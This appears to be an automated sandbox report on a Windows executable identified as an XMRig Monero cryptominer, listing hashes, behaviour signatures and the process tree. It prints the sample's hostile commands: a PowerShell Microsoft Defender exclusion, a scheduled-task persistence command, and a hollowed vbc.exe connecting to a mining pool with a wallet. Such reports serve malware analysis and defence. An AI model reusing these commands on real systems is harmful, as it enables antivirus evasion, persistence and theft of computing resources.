Analysis
-
max time kernel
47s -
max time network
52s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
23-11-2022 10:37
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
1.4MB
-
MD5
fd9a773f17376e3485292aa261e379ac
-
SHA1
c0e2bb23e43e2cff1ca052477b7e3f89458b9d50
-
SHA256
6ef9c0a33ef168ea07c55966deba59b977e7bf9fcefcda5944c66ea3f46453a7
-
SHA512
148da5fcd9c9d194466c3d1489cc71987d57905d6d1635a435e2ddcbf1cf851bdd02c0684a06cec46d44308044bf304ba0f6c789fd82d4cb9c4fff0b1ee91630
-
SSDEEP
24576:GiCj1Tnwpevq7BZlrkY/wP91wSRXZZAvnn3huG:GR1Twpevq7HJkY4nwSRXIPn7
Malware Config
Signatures
-
XMRig Miner payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/892-140-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/892-142-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/892-144-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/892-145-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/892-160-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
OWT.exepid process 240 OWT.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 992 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
OWT.exedescription pid process target process PID 240 set thread context of 892 240 OWT.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1940 timeout.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exeOWT.exepid process 676 powershell.exe 1772 powershell.exe 240 OWT.exe 240 OWT.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 1544 file.exe Token: SeDebugPrivilege 676 powershell.exe Token: SeDebugPrivilege 240 OWT.exe Token: SeDebugPrivilege 1772 powershell.exe Token: SeLockMemoryPrivilege 892 vbc.exe Token: SeLockMemoryPrivilege 892 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 892 vbc.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
file.execmd.exeOWT.execmd.exedescription pid process target process PID 1544 wrote to memory of 676 1544 file.exe powershell.exe PID 1544 wrote to memory of 676 1544 file.exe powershell.exe PID 1544 wrote to memory of 676 1544 file.exe powershell.exe PID 1544 wrote to memory of 992 1544 file.exe cmd.exe PID 1544 wrote to memory of 992 1544 file.exe cmd.exe PID 1544 wrote to memory of 992 1544 file.exe cmd.exe PID 992 wrote to memory of 1940 992 cmd.exe timeout.exe PID 992 wrote to memory of 1940 992 cmd.exe timeout.exe PID 992 wrote to memory of 1940 992 cmd.exe timeout.exe PID 992 wrote to memory of 240 992 cmd.exe OWT.exe PID 992 wrote to memory of 240 992 cmd.exe OWT.exe PID 992 wrote to memory of 240 992 cmd.exe OWT.exe PID 240 wrote to memory of 1772 240 OWT.exe powershell.exe PID 240 wrote to memory of 1772 240 OWT.exe powershell.exe PID 240 wrote to memory of 1772 240 OWT.exe powershell.exe PID 240 wrote to memory of 908 240 OWT.exe cmd.exe PID 240 wrote to memory of 908 240 OWT.exe cmd.exe PID 240 wrote to memory of 908 240 OWT.exe cmd.exe PID 908 wrote to memory of 1556 908 cmd.exe schtasks.exe PID 908 wrote to memory of 1556 908 cmd.exe schtasks.exe PID 908 wrote to memory of 1556 908 cmd.exe schtasks.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe PID 240 wrote to memory of 892 240 OWT.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3A05.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1940 -
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
PID:1556 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:892
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5fd9a773f17376e3485292aa261e379ac
SHA1c0e2bb23e43e2cff1ca052477b7e3f89458b9d50
SHA2566ef9c0a33ef168ea07c55966deba59b977e7bf9fcefcda5944c66ea3f46453a7
SHA512148da5fcd9c9d194466c3d1489cc71987d57905d6d1635a435e2ddcbf1cf851bdd02c0684a06cec46d44308044bf304ba0f6c789fd82d4cb9c4fff0b1ee91630
-
Filesize
1.4MB
MD5fd9a773f17376e3485292aa261e379ac
SHA1c0e2bb23e43e2cff1ca052477b7e3f89458b9d50
SHA2566ef9c0a33ef168ea07c55966deba59b977e7bf9fcefcda5944c66ea3f46453a7
SHA512148da5fcd9c9d194466c3d1489cc71987d57905d6d1635a435e2ddcbf1cf851bdd02c0684a06cec46d44308044bf304ba0f6c789fd82d4cb9c4fff0b1ee91630
-
Filesize
138B
MD55e2f84c26798ba68c86c65cc813ff327
SHA102dbcec8a3cad1fb2669d3a742189e056356330a
SHA2560e9144f538949853402b0e234490e5377f845fc0a2752e8410381edb08cea16a
SHA512a183cee16758c7bb45a3d84b0a2fab3d61ae3c99d5da260741d25d8575b508b2830d8eebf8cb2add74b348f218c6de4221749232cc301db187c3f481239b5507
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51fa62ba05737078b0cee08a8c996b7fb
SHA10cba1d51e7a9130aca67bd336c20d439b172510f
SHA256bf2e8079fcec8b91f0f7289e8bfa0c26e4850e8a2afd2045b887e6bbafd33696
SHA512203f9690d5c0a65436ff3ca3bd5674dc034ccf3287ae01353b8ea590a3137279d94f81940d12bfbd36acd9ba4b71f57122527a223696ee3e8b0837d7caf04133
-
Filesize
1.4MB
MD5fd9a773f17376e3485292aa261e379ac
SHA1c0e2bb23e43e2cff1ca052477b7e3f89458b9d50
SHA2566ef9c0a33ef168ea07c55966deba59b977e7bf9fcefcda5944c66ea3f46453a7
SHA512148da5fcd9c9d194466c3d1489cc71987d57905d6d1635a435e2ddcbf1cf851bdd02c0684a06cec46d44308044bf304ba0f6c789fd82d4cb9c4fff0b1ee91630